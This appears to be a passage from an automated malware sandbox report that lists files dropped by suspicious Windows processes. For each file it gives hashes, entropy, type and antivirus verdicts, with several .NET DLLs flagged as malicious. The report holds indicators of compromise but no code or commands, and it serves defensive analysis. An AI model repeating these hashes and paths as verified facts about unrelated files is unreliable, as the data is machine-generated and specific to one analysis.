                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.660491370279985
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 6G8OR42xrB.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 150bIjWiGH.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38912
                                                                                                                                                                        Entropy (8bit):5.679286635687991
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                        Entropy (8bit):5.870612048031897
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):38912
                                                                                                                                                                        Entropy (8bit):5.679286635687991
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):294912
                                                                                                                                                                        Entropy (8bit):6.010605469502259
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64000
                                                                                                                                                                        Entropy (8bit):5.857602289000348
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):89600
                                                                                                                                                                        Entropy (8bit):5.905167202474779
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33280
                                                                                                                                                                        Entropy (8bit):5.634433516692816
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23552
                                                                                                                                                                        Entropy (8bit):5.529329139831718
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32256
                                                                                                                                                                        Entropy (8bit):5.631194486392901
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):50176
                                                                                                                                                                        Entropy (8bit):5.723168999026349
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.660491370279985
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
